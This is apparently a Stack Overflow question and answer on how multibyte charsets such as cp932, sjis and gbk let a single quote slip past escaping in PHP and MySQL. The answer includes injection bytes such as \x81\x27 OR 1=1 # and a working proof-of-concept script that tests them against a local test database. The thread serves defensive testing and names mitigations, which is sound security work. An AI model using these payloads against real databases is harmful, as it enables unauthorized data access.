
I'm writing some unit tests to ensure my code isn't vulnerable to SQL injection under various charsets.

According to this answer, you can create a vulnerability by injecting \xbf\x27 using one of the following charsets: big5, cp932, gb2312, gbk and sjis

This is because if your escaper is not configured correctly, it will see the 0x27 and try to escape it such that it becomes \xbf\x5c\x27. However, \xbf\x5c is actually one character in these charsets, thus the quote (0x27) is left unescaped.
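To make the mechanism concrete, here is a minimal sketch. It assumes PHP's `addslashes()` as a stand-in for a charset-unaware escaper, and assumes the mbstring extension accepts `GBK` as an encoding name; `naive_escape()` is a hypothetical helper, not part of any library.

```php
<?php
// Hypothetical stand-in for an escaper that works byte by byte and
// knows nothing about the connection charset.
function naive_escape(string $input): string
{
    // addslashes() inserts 0x5c before every 0x27, regardless of encoding.
    return addslashes($input);
}

$escaped = naive_escape("\xbf\x27 OR 1=1 #");

// The first three bytes after escaping.
echo bin2hex(substr($escaped, 0, 3)), "\n"; // prints "bf5c27"

// Under GBK the first two bytes form a single character, so the quote
// that follows is no longer preceded by a backslash character.
var_dump(mb_strlen("\xbf\x5c", 'GBK'));
var_dump(mb_strpos($escaped, "'", 0, 'GBK'));
```

The point of the sketch is only that the escaper and the decoder disagree about where character boundaries fall; a real driver's escaping function differs in detail.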

As I've discovered through testing, however, this is not entirely true. It works for big5, gb2312 and gbk, but neither 0xbf27 nor 0xbf5c is a valid character in sjis or cp932.

Both

mb_strpos("abc\xbf\x27def","'",0,'sjis')

and

mb_strpos("abc\xbf\x27def","'",0,'cp932')

return 4, i.e., PHP does not see \xbf\x27 as a single character. The same call returns false for big5, gb2312 and gbk.

Also, this:

mb_strlen("\xbf\x5c",'sjis')

Returns 2 (it returns 1 for gbk).

So, the question is: is there another character sequence that makes sjis and cp932 vulnerable to SQL injection, or are they actually not vulnerable at all? Or is PHP lying, am I completely mistaken, and will MySQL interpret this totally differently?

mpen
  • I've seen this SQL injection with [Node.JS](http://meta.security.stackexchange.com/a/2243/25859) while participating in a CTF. [The theory is there (page 34)](https://www.ipa.go.jp/files/000017321.pdf) on how it works, but I can't seem to replicate it in PHP. More on what I tried [in the php chatroom](http://chat.stackoverflow.com/transcript/message/29401516#29401516). I will put a bounty on this question for anyone who can provide a concrete way/setup to exploit this in PHP. – HamZa Mar 17 '16 at 15:12
  • It's always good to test your code. However, if you actually wish to make your application safer against SQL injection, you might want to use prepared statements in your gateways and send the SQL and the data to the DB separately. mysqli and PDO both support this approach. Using prepared statements can also give you significant gains in speed when you repeatedly execute the same statement with varying data. http://stackoverflow.com/questions/8263371/how-can-prepared-statements-protect-from-sql-injection-attacks – Max Mar 23 '16 at 18:29
  • The only way to prevent SQL injection attacks is to use parameterized queries instead of string concatenations and replacements. No amount of escaping is going to fix this. It's also far easier to write parameterized query code than it is to use string manipulation. The existence of that `mb_strpos` call means that the code is vulnerable to injection attacks – Panagiotis Kanavos Mar 24 '16 at 13:39
  • @PanagiotisKanavos Parameterized queries are no doubt the best practice and what should be encouraged, but the very question we're discussing here illustrates that your comment is factually incorrect - replacing the `query("SET NAMES {$charset}")` call with `set_charset($charset)` will make this attack impossible. – Narf Mar 24 '16 at 14:22
  • @PanagiotisKanavos I was using `mb_strpos` to test if the single quote appears under that charset, or if it was 'hidden' by the multi-byte char. I'm not using it in code. – mpen Mar 24 '16 at 18:10
  • @Max The problem with prepared statements is that they require an active connection, and you can't use them to "see" your prefilled statement. I was writing a "fake connection" escaper that would mostly be used for dumping queries, either for debugging or to a file which would be ran later. You can't use parametrized queries unless you're running the query on the spot. Regardless, it's nice to know what attacks are possible. – mpen Mar 24 '16 at 18:15

1 Answer


The devil is in the details ... let's start with how the answer in question describes the list of vulnerable character sets:

For this attack to work, we need the encoding that the server's expecting on the connection both to encode ' as in ASCII i.e. 0x27 and to have some character whose final byte is an ASCII \ i.e. 0x5c. As it turns out, there are 5 such encodings supported in MySQL 5.6 by default: big5, cp932, gb2312, gbk and sjis. We'll select gbk here.

This gives us some context - 0xbf5c is used as an example for gbk, not as the universal character to use for all of the 5 character sets.
It just so happens that the same byte sequence is also a valid character under big5 and gb2312.

At this point, your question becomes as easy as this:

Which byte sequence is a valid character under cp932 and sjis and ends in 0x5c?

To be fair, most of the Google searches I tried for these character sets didn't give any useful results. But I did find this CP932.TXT file, in which, if you search for '5c ' (with the space there), you'll jump to this line:

0x815C 0x2015 #HORIZONTAL BAR

And we have a winner! :)
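If you'd rather not grep a mapping file, the same search can be sketched as a brute-force loop over lead bytes. This assumes the mbstring extension and its `CP932` / `SJIS` encoding names; `find_backslash_trail_chars()` is a hypothetical helper written for illustration.

```php
<?php
// Hypothetical helper: list every two-byte sequence ending in 0x5c that
// mbstring accepts as exactly one valid character in the given encoding.
function find_backslash_trail_chars(string $encoding): array
{
    $hits = [];
    for ($lead = 0x80; $lead <= 0xff; $lead++) {
        $candidate = chr($lead) . "\x5c";
        // Keep only sequences that are valid AND count as a single character;
        // a single-byte character followed by a plain backslash counts as two.
        if (mb_check_encoding($candidate, $encoding)
            && mb_strlen($candidate, $encoding) === 1) {
            $hits[] = bin2hex($candidate);
        }
    }
    return $hits;
}

foreach (['CP932', 'SJIS'] as $encoding) {
    $hits = find_backslash_trail_chars($encoding);
    echo $encoding, ': ', count($hits), ' candidate(s), 815c ',
        in_array('815c', $hits, true) ? 'included' : 'missing', "\n";
}
```

Keep in mind that this reflects what PHP's mbstring considers valid; MySQL's own tables may not agree on every sequence.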

An Oracle document confirms that 0x815c is the same character in both cp932 and sjis, and PHP recognizes it too:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis"));
int(1)
int(1)

Here's a PoC script for the attack:

<?php
$username = 'username';
$password = 'password';

$mysqli = new mysqli('localhost', $username, $password);
foreach (array('cp932', 'sjis') as $charset)
{
        $mysqli->query("SET NAMES {$charset}");
        $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}");
        $mysqli->query("USE {$charset}_db");
        $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)");
        $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')");

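        // 0x81 is a lead byte; the escaper turns 0x27 into 0x5c 0x27,
        // and the server then reads 0x81 0x5c as one character.
        $input = "\x81\x27 OR 1=1 #";
        $input = $mysqli->real_escape_string($input);
        $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1";
        $result = $mysqli->query($query);
        // The injected '#' comments out LIMIT 1, so more than one row
        // coming back means the quote escaped the string literal.
        if ($result && $result->num_rows > 1)
        {
                echo "{$charset} exploit successful!\n";
        }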

        $mysqli->query("DROP DATABASE {$charset}_db");
}
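As a counterpart to the PoC, here is a rough sketch of the mitigation mentioned in the comments on the question: switching the charset through `set_charset()` rather than a `SET NAMES` query. `escape_with_charset()` is a hypothetical helper; the assumption is that once the client library knows the connection charset, `real_escape_string()` treats `\x81\x27` as one character instead of escaping the `0x27` on its own.

```php
<?php
// Hypothetical helper: escape $input only after the client library has
// been told which charset the connection uses.
function escape_with_charset(mysqli $mysqli, string $charset, string $input): string
{
    // set_charset() informs both the server and the client library,
    // whereas a plain "SET NAMES" query only informs the server.
    if (!$mysqli->set_charset($charset)) {
        throw new RuntimeException("Could not switch to charset {$charset}");
    }

    return $mysqli->real_escape_string($input);
}

// Usage inside the loop above (needs a live connection):
// $input = escape_with_charset($mysqli, $charset, "\x81\x27 OR 1=1 #");
```

I haven't included expected output here, since it depends on a running MySQL server and its version.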
Narf
  • Aha! I may have read that as "5 such encodings" that have 0xbf5c as a character, not that have a character ending with 0x5c. Great answer, thank you! – mpen Mar 18 '16 at 15:41
  • I'm curious about this actually... `\x81\x27` is **not** a valid character in cp932, yet it's still interpreted as 1 char (I guess because 0x81 is a "lead byte"). If it weren't, the `\x27` would need to be escaped and we'd be vulnerable. Are there any charsets in which `0x__27` is considered two chars, but `0x__5c` is one char? In such a scenario it would be tricky to escape correctly. – mpen Mar 18 '16 at 16:13
  • Nvm, [there doesn't appear to be any](https://gist.github.com/mnpenner/cd7806b645c35ea634d0) such charsets. – mpen Mar 18 '16 at 16:20
  • However, there [are a lot of naughty chars](https://gist.github.com/mnpenner/1c5524a531e513f2a97f) – mpen Mar 18 '16 at 16:37
  • Yep, `\x81` is a leading byte in `cp932`, `sjis` and a lazy check that doesn't use a table lookup would count it as valid. But even if that wasn't the case, it wouldn't matter ... the magic is in `mysql_real_escape_string()` treating it as ASCII and hence adding `\x5c` in the middle. – Narf Mar 18 '16 at 17:01